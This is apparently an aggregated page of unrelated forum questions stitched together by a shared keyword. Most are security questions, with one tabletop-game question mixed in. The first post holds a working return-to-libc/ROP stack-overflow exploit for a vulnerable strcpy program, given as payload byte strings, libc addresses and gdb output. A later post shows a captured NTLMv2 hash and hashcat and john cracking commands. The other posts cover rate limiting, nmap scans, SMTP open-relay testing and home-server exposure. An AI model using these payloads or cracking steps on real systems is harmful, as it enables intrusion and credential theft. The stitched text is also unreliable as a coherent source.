ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A vulnerable C program to stack buffer overflow, requires 112 byte stuffing to get to return address of the calling function. Here the Strcpy() is the vulnerable function.

void f(char *name){   char buf[100];   strcpy(buf, name); }  void main(int argc, char *argv[]){   f(argv[1]); }  

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

(gdb) print execl       $  1 =  0xb7eb7b60 <__GI_execl> (gdb) print exit       $  2 =  0xb7e359e0 <__GI_exit>  (gdb) info proc map  ...(output omitted) (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"       0xb7f62b0b       1 pattern found. (gdb) x/s 0xb7f62b0b       0xb7f62b0b:   "/bin/sh"  (gdb) run $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $  (python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')       process 3161 is executing new program: /bin/dash       /bin/sh: 0: Can't open UWVS��������       [Inferior 1 (process 3161) exited with code 0177] 

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief i added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

addr. exit() fake byte (NULL will be written here)   addr. /bin/sh addr. /bin/sh addr. pop\pop\pop\ret addr. execl() addr. where to write NULL byte addr. pop\ret addr. gets()        <-- ESP will be here when is time to return to caller             112 NOP 

from gdb i run the exploit, i type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb i used to take the stack layer:

(gdb) b 10     --> this is to stop after strcpy() in the .c code   Breakpoint 1 at 0x8048497: file main.c, line 10.  (gdb) run $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')    Starting program: /home/marco/rop/main $  (python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')   Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10   (gdb) b *execl   Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.   (gdb) c   Continuing.    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31   31    execl.c: File o directory non esistente.   (gdb) x/x $  esp   0xbffff5ec:   0xb7ef334f   (gdb) x/x $  esp+4   0xbffff5f0:   0xb7f64a0b   (gdb) x/x $  esp+8   0xbffff5f4:   0xb7f64a0b   (gdb) x/4x $  esp+12   0xbffff5f8:   0x00    0x42    0x42    0x42   (gdb) x/s $  esp+12   0xbffff5f8:   "" 

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

"\xe0\x83\xe6\xb7" +   -> gets() "\x6e\xd0\xe2\xb7" +   -> pop/ret "\xf8\xf5\xff\xbf" +   -> address where to write NULL "\x80\x9a\xeb\xb7" +   -> execl() "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh   "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh "\x42\x42\x42\x42" +   -> fake address to be overwritten "\xd0\x79\xe3\xb7"     -> exit() 

Can you kill a Tarrasque with the Open Hand monk’s Quivering Palm feature?

I see the Tarrasque has Legendary Resistance so it can pass failed saving throws. It has a list of Legendary Actions 3 times a day. I keep seeing people say to keep making it do saves to get rid of the Legendary Resistance even though it is not listed under the limited Legendary actions.

Since the Way of the Open Hand monk’s Quivering Palm technique relies on failing a Constitution save to instantly reduce the target to 0 HP, can Quivering Palm kill a Tarrasque?

Can’t open hash with John or Hashcat

I’m trying to open a hash with John and HashCat, but both don’t work?

NTLMv2 Response Captured from 192.168.1.1 DOMAIN: DEV29-APP01 USER: testuser LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:3045e74dac0653865d353e93e8c5ca8c  NT_CLIENT_CHALLENGE:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000 

Manually rewritten to:

testuser::DEV29-APP01:3045e74dac0653865d353e93e8c5ca8c:0101000000000000c2af33072879d60195da2f228ded77b7000000000200120041004e004f004e0059004d004f00550053000100120041004e004f004e0059004d004f00550053000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f00750073000800300030000000000000000000000000200000feb33cee8c0f22d8b27a15278ee7fdfbb47b23655ada87d2da7b3a3b1db5450e0a00100000000000000000000000000000000000090038004d005300530051004c005300760063002f003100360038002e00360033002e003100310031002e003100300036003a0031003400330033000000000000000000  me>hashcat -m 5600 -a 3 testuser.txt --force Hashfile 'testuser.txt' on line 1 (testus...31003400330033000000000000000000): Separator unmatched No hashes loaded.  me>john --format=netntlmv2 testuser.txt Using default input encoding: UTF-8 No password hashes loaded (see FAQ) me>john --show --format=netntlmv2 testuser.txt 0 password hashes cracked, 0 left 

What am I missing?

API open endpoint best practices

I am currently developing an API for my front-end React application. All my routes (besides the two I’ll mention below) are secure by the use of JWTs. They get generated once a user logs in and is then used for the remainder of the session. The app to API connection will be over HTTPS so it should hinder MiTM attacks.

The two endpoints (which you have probably guessed) is the login and register endpoint. I have come across this question that suggests using HMAC. If I understand it correctly, the front end will create a hash (using a shared secret) of the request body and send it with the request; once the request arrives the API will generate a hash (with the same shared secret) based off of the request and compare the two hash values. If they don’t match then the request was tampered with or is fraudulent.

So that obviously verifies the integrity of the requests made. The other problem is now that, anyone can just spam the hell out of the endpoint and effectively DoS/DDoS the endpoint. Even though the requests are fraudulent, the request will still be tried to be verified on the API side by calculating the hash. Which takes compute power. So if I am getting a lot of requests, very quickly, it will drag my API down.

Would it be right to say that I need to rate-limit the endpoint based on the request IP address? Say limit the call to 10 per hour from a specific IP address? Would appreciate any feedback with regards how to stop the spamming of the endpoints.

Are the open ports 53,139,445 and 49152 expected on a Linux machine? [closed]

I ran an nmap stealth scan on my home network (using linux) and this is my result. I don’t know why netbios is open – I ran the samba command and it is not recognised, so I don’t think I have Samba on my machine. If someone could clarify that would be great. I am running Ubuntu Linux. I’ve also noticed a lot of TCP ESTABLISHED connections I don’t recognise. Is this something to investigate further?

Not shown: 993 closed ports PORT      STATE    SERVICE 22/tcp    filtered ssh 53/tcp    open     domain 80/tcp    open     http 139/tcp   open     netbios-ssn 443/tcp   open     https 445/tcp   open     microsoft-ds 49152/tcp open     unknown 

open relay test discrepancy

nmap smtp open relay test shows (verbose mode):

smtp-open-relay: Server is an open relay (5/16 tests)   MAIL FROM:<antispam@[xxx.xxx.xx.xx]> -> RCPT TO:<relaytest%nmap.scanme.org@XHS5P>   MAIL FROM:<antispam@[xxx.xxx.xx.xx]> -> RCPT TO:<"relaytest@nmap.scanme.org">   MAIL FROM:<antispam@[xxx.xxx.xx.xx]> -> RCPT TO:<"relaytest%nmap.scanme.org">   MAIL FROM:<antispam@[xxx.xxx.xx.xx]> -> RCPT TO:<nmap.scanme.org!relaytest>   MAIL FROM:<antispam@[xxx.xxx.xx.xx]> -> RCPT TO:<nmap.scanme.org!relaytest@XHS5P> 

xxx.xxx.xx.xx being host IP smtp: Microsoft ESMTP 6.0.2600.5949

Previous tests through mxtoolbox:

MAIL FROM:<supertool@mxtoolbox.com> 250 2.1.0 supertool@mxtoolbox.com....Sender OK [703 ms] RCPT TO:<test@mxtoolboxsmtpdiag.com> 550 5.7.1 Unable to relay for test@mxtoolboxsmtpdiag.com [696 ms] 

According to mxtoolbox, my host is not an open relay smtp

My question:

  • can I consider nmap test unreliable?

In order to check, nmap results I made a few test myself using nmap output

Here’s what I got:

HELO 250 XHS5P Hello [yy.yy.yyy.yyy] MAIL FROM:<tester@bogusyyyyyw.com> 250 2.1.0 tester@bogusyyyyyw.com....Sender OK RCPT TO:<"relaytest@nmap.scanme.org"> 250 2.1.5 "relaytest@nmap.scanme.org"@XHS5P 

status code 250 2.1.5 means: email has been delivered

So, nmap was right. But I still believe it was not, since perhaps it has to do with the the fact that the recipient has double quotes

Can someone help me to figure out if my host is an open relay?

thanks a lot

Is it safe to open a server application on the internal network to the public internet

I am a programmer but I am currently learning about web development in general. I’m creating a server on my local host using nodejs and express. It’s available on my local host but I want to test it with a domain I have, so I can access it from any device anywhere.

What I decided to do was change my router settings to direct any traffic it gets on its IP to my computers internal IP on port 3000 so anyone can access the my html pages from my local machine. This was working quite well.

But after some hours of working Bitdefender Antivirus alerted that It blocked some attacks from a specific IP on port 3000. This lead me to question how safe It was to be doing this. The server is running on my home machine that has my regular files and documents.

Of course I’m only serving the html pages for the site but can someone kindly explain the security implications of using your regular home router as a server as opposed to a dedicated server or a web hosting service.

Note 1: I’m not interested in other aspects such as bandwidth since that’s not going to be a problem.

Note 2: Also I’m using Netlify’s free web hosting right now as an alternate (or instead of the alternate) but it’s god awfully slow to load my simplest html page. It takes a while (inconsistent as well) before the browser can even resolve the domain and then loads the content progressively slowly ( I mean you see things like the main image slowly reveal). when using my own router it’s blazingly fast; not just on my local machine